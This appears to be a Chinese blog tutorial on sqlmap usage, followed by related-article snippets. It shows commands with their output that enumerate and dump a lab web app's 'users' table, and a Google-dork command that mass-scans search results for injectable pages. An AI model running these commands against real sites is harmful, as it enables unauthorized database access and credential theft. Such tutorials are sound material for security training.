sqlmap 使用举例

详细的请见:

http://drops.wooyun.org/tips/143

http://wenku.baidu.com/link?url=45xj6EVVWQjV8upwrBAMIqPP3xMcmi6Zh2pGe27sZ6TZbsBtPJ3QjuIIz672egOe96UCt6T3LuPmczJIUGECmcEQLDRQ3DhYE4qGUmRhDLK

1. 检测特定url一个参数的get:

python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -v 3 -f --banner

–flush-session #刷新当前目标的会话文件
–fresh-queries #忽略在会话文件中存储的查询结果-v 3    #显示检测过程中的payload

列出所有的库和表:

python sqlmap.py -u "http://192.168.118.138/cat.php?id=1"  --dump-all -v 0

python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -f --banner --users

python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -f --banner --dbs

available databases [2]:
[*] information_schema
[*] photoblog

python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -f --banner -D "photob
log" --tables

Database: photoblog
[3 tables]
+------------+
| categories |
| pictures   |
| users      |
+------------+

python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -f --banner -D "photob
log" -T "users" --columns

Database: photoblog
Table: users
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | mediumint(9) |
| login    | varchar(50)  |
| password | varchar(50)  |
+----------+--------------+

python sqlmap.py -u "http://192.168.118.138/cat.php?id=1"  --dump -D "photoblog"
 -T "users" --columns

2. 检测特定url一个参数的post:

python sqlmap.py -u "http://192.168.118.138/cat.php" --data="id=1" -v 3 -f --banner

当GET或POST的数据需要用其他字符分割测试参数的时候需要用到此参数。

例子:

python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users

3. 检测google搜索出的结果

python sqlmap.py -g "inurl:\".php?id=1\""
时间: 2024-09-27 06:59:25

sqlmap 使用举例的相关文章

sqlmap进阶之路

1.sqlmap直接数据库,文件读取目标 -l ,-x(xml站点地图),-m(多行文本url),-r, url探测 --banner(t探测数据库), -g(Google)批量扫描注入 2,使用post方式时可以指定分隔符 --pa'ram-del="&"  , bp截取的文件参数后面加*如同 使用--level 3 检测cookie注入, --heads 可以设置额外的http请求参数如:refer-forword-x 3. 设置http协议认证 (--auth-type(

BurpSuite日志分析导入SqlMap进行批量扫描-BurpLogFilter

https://github.com/tony1016/BurpLogFilter    一个python3写的,用于过滤BurpSuite日志的小程序 WHY? 为什么要写这个程序呢?强大的SqlMap支持使用BurpSuite的日志进行批量分析,但是BurpSuite的日志记录了所有走代理的流量,包括静态资源啊,重复的提交啊,这些都会影响SqlMap的分析效率.于是打算写一个小程序,可以做到: 可以按照域名过滤请求 可以自动过滤静态资源请求 可以自动按照模式过滤URL,即相同URL和参数的请

JavaSE-接口应用举例

package com.btp.t2; /* * 接口应用的举例 */ public class TestUSB { public static void main(String[] args) { new Computer().doWork(new Printer()); new Computer().doWork(new Flash()); //实现接口的匿名类的对象 USB phone=new USB(){ @Override public void start() { // TODO 自

veridata实验举例(3)验证veridata查找出insert操作导致的不同步现象

veridata实验举例(3)验证veridata查找出insert操作导致的不同步现象 续接:<veridata实验举例(2)验证表BONUS与表SALGRADE两节点同步情况>,地址:点击打开链接 环境: Item Source System Target System Platform Red Hat Enterprise Linux Server release 5.4 Red Hat Enterprise Linux Server release 5.4 Hostname gc1 g

C++多重继承中的虚继承和虚函数举例

上一篇虚继承举例:http://10638473.blog.51cto.com/10628473/1964414 本文将A类中的show()函数前加上virtual关键字. //多重继承 #include <iostream> using namespace std; class A { public:     int a;     A(int a=0):a(a)     {         cout<<"A基类A::A()"<<endl;     

c++局部变量经典举例

局部变量: 在函数内部声明的变量为局部变量,局部变量的意思即该变量只存活在该函数中,假如该函数调用结束,那么该变量的寿命也结束了. 举例: #include<iostream> using namespace std; void swap(int ,int );//两个参数变量可以省略 int main() { int x=3,y=4; cout<<"在main函数中,调用swap函数之前,x的值为"<<x<<",y的值为:&q

SQL注入之SQLmap入门

什么是SQLmap? SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹.访问底层文件系统.执行命令). 读者可以通过位于SourceForge的官方网站下载SQLmap源码:http://sourceforge.net/projects/sqlmap/ SQLmap的作者是谁? Bernardo DameleAssumpcao Guimaraes (@inquisb),读者可以通过[email protected]与他取得联

SQLMAP 注射工具用法

1 . 介绍1.1 要求 1.2 网应用情节 1.3 SQL 射入技术 1.4 特点 1.5 下载和更新sqlmap 1.6 执照 2 . 用法2.1 帮助 2.2 目标URL 2.3 目标URL 和verbosity 2.4 URL 参量 2.5 Google dork 2.6 HTTP 方法: 得到或张贴 2.7 张贴的数据串 2.8 HTTP 曲奇饼倒栽跳水 2.9 HTTP 用户代理倒栽跳水 2.10 任意HTTP 用户代理倒栽跳水 2.11 HTTP 认证 2.12 HTTP 代理人 

sqlmap批量扫描burpsuite拦截的日志记录

1.功能上,sqlmap具备对burpsuite拦截的request日志进行批量扫描的能力 python sqlmap.py -l hermes.log --batch -v 3 --batch:会自动选择yes -l : 指定日志文件 -v: 调试信息等级,3级的话,可以看大注入的payload信息 2.如何配置burpsuite拦截扫描对象? 4.其他方式拦截的request日志文件,也可以 5.使用--smart智能探测效果不是很好,还是采用一些配置,加深扫描比较好 python sqlm